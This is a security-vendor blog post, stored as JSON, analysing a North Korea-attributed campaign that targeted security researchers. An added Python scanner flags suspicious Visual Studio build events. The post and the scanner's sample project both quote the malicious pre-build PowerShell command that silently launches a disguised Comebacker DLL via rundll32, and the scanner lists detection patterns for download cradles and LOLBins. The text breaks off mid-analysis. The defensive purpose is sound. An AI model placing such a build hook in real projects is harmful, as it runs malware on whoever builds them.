{"id":92718,"date":"2021-01-28T09:00:55","date_gmt":"2021-01-28T17:00:55","guid":{"rendered":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/?p=92718"},"modified":"2024-05-22T10:44:55","modified_gmt":"2024-05-22T17:44:55","slug":"zinc-attacks-against-security-researchers","status":"publish","type":"post","link":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/01\/28\/zinc-attacks-against-security-researchers\/","title":{"rendered":"ZINC attacks against security researchers"},"content":{"rendered":"\n
\n

April 2023 update<\/strong> \u2013 Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned around the theme of weather. Zinc<\/strong> is now tracked as Diamond Sleet<\/strong>.<\/p>\n\n\n\n

To learn about how the new taxonomy represents the origin, unique traits, and impact of threat actors, and to get a complete mapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming taxonomy<\/strong><\/a>.<\/p>\n<\/blockquote>\n\n\n

In recent months, Microsoft has detected cyberattacks targeting security researchers by an actor we track as ZINC. The campaign originally came to our attention after Microsoft Defender for Endpoint detected an attack in progress. Observed targeting includes pen testers, private offensive security researchers, and employees at security and tech companies. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to ZINC, a DPRK-affiliated and state-sponsored group, based on observed tradecraft, infrastructure, malware patterns, and account affiliations.<\/p>\n

This ongoing campaign was reported by Google\u2019s Threat Analysis Group (TAG<\/a>) earlier this week<\/a>, capturing the browser-facing impact of this attack. By sharing additional details of the attack, we hope to raise awareness in the cybersecurity community about additional techniques used in this campaign and serve as a reminder to security professionals that they are high-value targets for attackers.<\/p>\n

We also want to thank our industry colleagues at Twitter and GitHub for their collaboration in this investigation and rapid actions to suspend the malicious accounts targeting the security community and our mutual customers.<\/p>\n

We are sharing this information with the community as part of our mission to shine a light on bad actors and elevate awareness of low-profile tactics and techniques that fly under the radar of security operations centers (SOCs) and security professionals and are easily dismissed as low-level alerts or benign chatter. The related IoCs and Microsoft Defender for Endpoint<\/a> product detections we share in this blog will help SOCs proactively hunt for related activity in their environments and elevate any low-level alerts for remediation. ZINC used a variety of new techniques to target the victims, including gaining credibility on social media with genuine content, sending malicious Visual Studio projects, and using a watering hole website weaponized with browser exploits.<\/p>\n

Technical details<\/h2>\n

In mid-2020, ZINC started building a reputation in the security research community on Twitter by retweeting high quality security content and posting about exploit research from an actor-controlled blog. Throughout the lifetime of the campaign, the actor operated several accounts that accounted for roughly 2,000 followers, including many prominent security researchers.<\/p>\n

In the image below, one of the actor-controlled Twitter accounts retweets another of their accounts to amplify their own posts. The posts from the actors received a reasonable amount of attention, usually accumulating several hundred likes or retweets.<\/p>\n

\"Screenshot<\/p>\n

Figure <\/em>1.<\/em> Actor-controlled Twitter handles<\/em><\/p>\n

After building their reputation across their established social media accounts, the actors started approaching potential targets on social media platforms such as Twitter and LinkedIn. The conversations were often seemingly innocuous, asking security questions or talking about exploit techniques. If the researcher was responsive, the actor would offer to move the conversation to another platform (e.g., email, Discord) and, in some cases, then send files as encrypted or PGP-protected ZIPs.<\/p>\n

ZINC also used their Twitter accounts to post links to a security blog they owned (br0vvnn[.]io<\/em>). These links were also shared by many others in the security community on Twitter and other social media platforms, further deepening trust for the owner and content.<\/p>\n

A blog post titled DOS2RCE: A New Technique To Exploit V8 NULL Pointer Dereference Bug<\/em> was shared by the actor on Twitter on October 14, 2020. From October 19-21, 2020, some researchers who had not been contacted or sent any files by ZINC profiles clicked the links while using the Chrome browser, and known ZINC malware appeared on their machines soon after. This suggests that a Chrome browser exploit chain was likely hosted on the blog, although we have not been able to prove this. Since some of the victims\u2019 browsers were fully patched, it is also suspected, but unproven, that the exploit chain used 0-day or patch gap<\/a> exploits. We believe that not all visitors to the site were compromised, even during the dates listed above.<\/p>\n

Malicious Visual Studio project<\/h3>\n

Some of the files sent by ZINC to researchers were malicious Visual Studio projects that included prebuilt binaries. One of the binaries used the well-known name Browse.VC.db<\/em> (the file name Visual Studio uses for its IntelliSense database) but was a malicious DLL rather than a database file. Microsoft Defender for Endpoint detects these DLLs as Comebacker malware. A pre-build event with a PowerShell command was used to launch Comebacker via rundll32<\/em>. This use of a malicious pre-build event is an innovative technique to gain execution: the command runs with the researcher\u2019s privileges as soon as the project is built, before the compiler touches any of the source code the researcher might have reviewed.<\/p>\n

An example of the PowerShell in the pre-build event can be seen here:<\/p>\n

<PreBuildEvent><\/em><\/p>\n

<Command><\/em>
powershell -executionpolicy bypass -windowstyle hidden if(([system.environment]::osversion.version.major -eq 10) -and [system.environment]::is64bitoperatingsystem -and (Test-Path x64\\Debug\\Browse.VC.db)){rundll32 x64\\Debug\\Browse.VC.db,ENGINE_get_RAND 7am1cKZAEb9Nl1pL 4201 }<\/em>
<\/Command><\/em><\/p>\n

<\/PreBuildEvent><\/em><\/p>\n

Pre-build events are stored in the .vcxproj file in Visual Studio solutions. The page How to: Use Build Events in MSBuild Projects<\/a> has a list of other build events and example XML for the events. It would also be possible to abuse a custom build step in the same way, so a project received from an untrusted source should have its .vcxproj (and any .props or .targets files it imports) opened in a text editor and every Command element and prebuilt binary inspected before it is built.<\/p>\n
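The following scanner is an added example written for this page, not tooling from Microsoft or from the original post. It parses a .vcxproj with the standard MSBuild XML namespace, pulls every Command element under a pre-build, pre-link, post-build or custom build step, and flags the indicators seen in the command above (PowerShell with execution-policy bypass and a hidden window, rundll32, and rundll32 loading a file whose extension is not .dll). The sample project embedded below is constructed for the example; it wraps the pre-build event quoted in the post under Debug|x64 next to a benign post-build copy step, and the indicator list is an assumption about what is worth reviewing, not a complete signature set.

```python
"""Scan a .vcxproj for build-event commands that execute arbitrary shell commands."""
import re
import xml.etree.ElementTree as ET

MSBUILD_NS = "http://schemas.microsoft.com/developer/msbuild/2003"

# Parent elements whose <Command> child MSBuild runs through cmd.exe at build time.
COMMAND_HOSTS = {"PreBuildEvent", "PreLinkEvent", "PostBuildEvent",
                 "CustomBuildStep", "CustomBuild"}

# Indicator name -> regex over the command text (matched case-insensitively).
# Assumed list for the example; tune it to your own build conventions.
INDICATORS = [
    ("powershell", r"\bpowershell(?:\.exe)?\b|\bpwsh(?:\.exe)?\b"),
    ("execution policy bypass", r"-(?:executionpolicy|ep)\s+bypass\b"),
    ("hidden window", r"-(?:windowstyle|w)\s+hidden\b"),
    ("encoded command", r"-(?:encodedcommand|enc|e)\s+[A-Za-z0-9+/=]{20,}"),
    ("rundll32", r"\brundll32(?:\.exe)?\b"),
    ("other LOLBin", r"\b(?:regsvr32|mshta|certutil|bitsadmin|wscript|cscript)(?:\.exe)?\b"),
    ("download cradle", r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"),
]

# rundll32 <file>,<export>: capture the file so its extension can be checked.
RUNDLL32_TARGET = re.compile(r'\brundll32(?:\.exe)?\s+"?([^\s",]+)"?\s*,', re.I)


def local_name(tag):
    """Strip the XML namespace from an ElementTree tag."""
    return tag.rsplit("}", 1)[-1]


def classify_command(command):
    """Return the list of suspicious indicators found in one build command."""
    hits = [name for name, pattern in INDICATORS if re.search(pattern, command, re.I)]
    m = RUNDLL32_TARGET.search(command)
    if m and not m.group(1).lower().endswith(".dll"):
        # Comebacker was loaded from a file named like the IntelliSense DB, not a *.dll.
        hits.append("rundll32 loads non-.dll file: " + m.group(1))
    return hits


def scan_vcxproj(xml_text):
    """Return every build-event command in the project with its context and indicators."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    results = []
    for elem in root.iter(f"{{{MSBUILD_NS}}}Command"):
        host = parent_of.get(elem)
        if host is None or local_name(host.tag) not in COMMAND_HOSTS:
            continue
        # Nearest enclosing Condition tells us which configuration triggers the command.
        condition, node = "", host
        while node is not None and not condition:
            condition = node.get("Condition", "")
            node = parent_of.get(node)
        command = " ".join((elem.text or "").split())
        results.append({
            "event": local_name(host.tag),
            "condition": condition,
            "command": command,
            "indicators": classify_command(command),
        })
    return results


def suspicious_events(xml_text):
    """Only the build events that tripped at least one indicator."""
    return [r for r in scan_vcxproj(xml_text) if r["indicators"]]


# Constructed sample project for this example (not a real file from the campaign).
SAMPLE_VCXPROJ = r"""<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <PreBuildEvent>
      <Command>powershell -executionpolicy bypass -windowstyle hidden if(([system.environment]::osversion.version.major -eq 10) -and [system.environment]::is64bitoperatingsystem -and (Test-Path x64\Debug\Browse.VC.db)){rundll32 x64\Debug\Browse.VC.db,ENGINE_get_RAND 7am1cKZAEb9Nl1pL 4201 }</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <PostBuildEvent>
      <Command>xcopy /y "$(TargetPath)" "$(SolutionDir)bin\"</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
</Project>
"""

if __name__ == "__main__":
    for r in suspicious_events(SAMPLE_VCXPROJ):
        print(f"{r['event']} [{r['condition']}]: {', '.join(r['indicators'])}")
```

Run it against every .vcxproj in an untrusted solution before opening it in Visual Studio; the scanner only covers the Command elements MSBuild runs as shell commands, so imported .props or .targets files and Exec tasks still need a manual look.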

Analyzing Comebacker DLLs<\/h3>\n

Once the malicious Visual Studio project was built, the process drops C:\\ProgramData\\VirtualBox\\update.bin<\/em> and adds the file to an autostart registry key. Update.bin (SHA-256: 25d8ae46\u2026<\/em>) is a different 64-bit DLL file embedded inside Browse.VC.db.<\/p>\n